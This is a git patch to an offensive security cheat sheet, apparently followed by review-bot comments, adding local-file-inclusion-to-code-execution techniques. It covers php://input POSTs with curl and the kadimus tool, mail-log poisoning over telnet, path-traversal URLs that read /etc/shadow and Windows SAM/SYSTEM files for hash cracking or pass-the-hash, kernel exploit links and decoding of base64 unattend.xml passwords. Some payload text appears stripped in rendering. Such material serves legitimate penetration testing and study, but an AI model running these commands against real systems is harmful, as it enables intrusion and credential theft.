From a85fa5af28c7ff47a5674d3fb4315c04d7d9a45a Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 00:05:47 +0200 Subject: [PATCH] Local File Include : rce via mail + kadimus --- File Inclusion/README.md | 73 ++++++++++++++++++- .../Linux - Privilege Escalation.md | 9 ++- .../Windows - Privilege Escalation.md | 12 ++- 3 files changed, 85 insertions(+), 9 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index c6b17b1..25cd148 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -27,6 +27,7 @@ * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) +* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools @@ -119,7 +120,12 @@ can be chained with a compression wrapper for large files. http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` -NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` +NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` + +```powershell +./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page +curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php +``` ### Wrapper zip:// 
@@ -150,11 +156,16 @@ http://example.com/index.php?page=expect://ls ### Wrapper input:// -Specify your payload in the POST parameters +Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell -http://example.com/index.php?page=php://input -POST DATA: +curl -X POST --data "" "https://example.com/index.php?page=php://input%00" -k -v +``` + +Alternatively, Kadimus has a module to automate this attack. + +```powershell +./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` ### Wrapper phar:// @@ -268,6 +279,35 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` +### RCE via Mail + +First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. + +```powershell +root@kali:~# telnet 10.10.10.10. 25 +Trying 10.10.10.10.... +Connected to 10.10.10.10.. +Escape character is '^]'. +220 straylight ESMTP Postfix (Debian/GNU) +helo ok +250 straylight +mail from: mail@example.com +250 2.1.0 Ok +rcpt to: root +250 2.1.5 Ok +data +354 End data with . +subject: +data2 +. +``` + +In some cases you can also send the email with the `mail` command line. + +```powershell +mail -s "" www-data@10.10.10.10. < /dev/null +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) 
@@ -296,6 +336,31 @@ Use the LFI to include the PHP session file login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` +## LFI to RCE via credentials files + +This method require high privileges inside the application in order to read the sensitive files. + +### Windows version + +First extract `sam` and `system` files. + +```powershell +http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam +http://example.com/index.php?page=../../../../../../WINDOWS/repair/system +``` + +Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. + +### Linux version + +First extract `/etc/shadow` files. + +```powershell +http://example.com/index.php?page=../../../../../../etc/shadow +``` + +Then crack the hashes inside in order to login via SSH on the machine. + ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 09af954..681ef8a 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,7 +43,7 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) -* [Common Exploits](#common-exploits) +* [Kernel Exploits](#kernel-exploits) * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) 
@@ -542,8 +542,13 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root +## Kernel Exploits -## Common Exploits +Precompiled exploits can be found inside these repositories, run them at your own risk ! +* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) +* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) + +The following exploits are known to work well. ### CVE-2016-5195 (DirtyCow) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 87852a2..bb4b6da 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -94,7 +94,6 @@ List all users ```powershell net user -net user Swissky whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name @@ -250,7 +249,7 @@ REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ### Passwords in unattend.xml -Location of the unattend.xml files +Location of the unattend.xml files. ```powershell C:\unattend.xml @@ -265,7 +264,7 @@ Example content ```powershell - *SENSITIVE*DATA*DELETED* + U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== true Administrateur @@ -281,6 +280,13 @@ Example content ``` +Unattend credentials are stored in base64 and can be decoded manually with base64. + +```powershell +$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d +SecretSecurePassword1234* +``` + The Metasploit module `post/windows/gather/enum_unattend` looks for these files. ### IIS Web config
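Review bot: the new table-of-contents anchor `#lfi-o-rce-via-credentials-files` in `File Inclusion/README.md` (hunk `@@ -27,6 +27,7 @@`) is missing the `t` and will not resolve to the heading `## LFI to RCE via credentials files` added later in the same file; change it to `#lfi-to-rce-via-credentials-files`.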
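Review bot: the added `./kadimus ...` and `curl ... | base64 -d > index.php` block in hunk `@@ -119,7 +120,12 @@` is fenced as `powershell` although both lines are Linux shell commands; tag the fence `bash` (the same applies to the new `kadimus`, `telnet` and `mail` blocks further down) so readers do not try to run them in PowerShell. Minor: `chained multiple times :` has a stray space before the colon.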
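Review bot: in hunk `@@ -150,11 +156,16 @@` the `--data ""` argument of the `curl` command and the `-C ''` argument of the `kadimus` command are empty, so the examples as rendered send no body at all; if the intended content contained angle brackets that were stripped during rendering, escape them so the text actually appears. The sentence `Specify your payload in the POST parameters, this can be done with a simple curl command.` is a comma splice; split it into two sentences. It is also worth stating that `-k` disables TLS certificate verification rather than leaving that flag unexplained.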
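Review bot: in the `RCE via Mail` section (hunk `@@ -268,6 +279,35 @@`) the IP addresses carry a trailing dot (`telnet 10.10.10.10. 25`, `www-data@10.10.10.10.`) that breaks the commands when copied; drop it. The sentence `include the log file located at http://example.com/index.php?page=/var/log/mail` conflates the URL with the file path; say that `/var/log/mail` is the file being included through the `page` parameter. The `354 End data with .` response, the `subject:` line and `mail -s ""` have all lost their content during rendering (the SMTP terminator sequence and the subject text are missing); restore or escape them. The section should also name its preconditions, namely an SMTP service that accepts the message and a mail log readable by the web server account, since denying either one is the mitigation a defender will look for.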
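Review bot: in hunk `@@ -296,6 +336,31 @@` the sentence `This method require high privileges inside the application` should read `requires`, and the privilege that matters is the file-system access of the process serving the page, not anything inside the application: `/etc/shadow` and the `WINDOWS/repair` copies of `SAM` and `SYSTEM` are readable only by a highly privileged account, so the technique works only when the web server itself runs as one. `First extract /etc/shadow files` should be singular (`the /etc/shadow file`), and the `samdump2` sentence switches from the lower-case `sam`/`system` used in the URLs to upper-case `SYSTEM SAM`; use one form. The Windows fence is tagged `powershell` but contains only URLs.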
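Review bot: the Kernel Exploits rewrite in `Linux - Privilege Escalation.md` (hunks `@@ -43,7 +43,7 @@` and `@@ -542,8 +542,13 @@`) leaves no blank line between `Precompiled exploits can be found inside these repositories, run them at your own risk !` and the bullet list that follows, which some Markdown renderers require to start a list; add one and remove the space before `!`. `run them at your own risk` deserves a concrete caveat: precompiled binaries from third-party repositories cannot be reviewed the way source can, so build from source where possible and record the hash of whatever was executed. While here, the unchanged context line `[CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)` has a stray `[` inside the anchor that breaks the link.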
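Review bot: the base64 value inserted into the `unattend.xml` example (hunk `@@ -265,7 +264,7 @@`) ends in `Kgo==`, while the decode example in hunk `@@ -281,6 +280,13 @@` uses `Kgo=`; the two must match, and the single `=` is the correct padding for the 25-character string `SecretSecurePassword1234*` plus the newline `echo` appends, so fix the XML value. The decode block is fenced `powershell` but shows a `$ echo ... | base64 -d` Unix pipeline; either tag it `bash` or give the PowerShell equivalent, `[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('...'))`. The sentence `stored in base64 and can be decoded manually with base64` repeats itself; `are only base64-encoded, not encrypted` says the same thing and makes the defensive point that these files must be removed or scrubbed after provisioning.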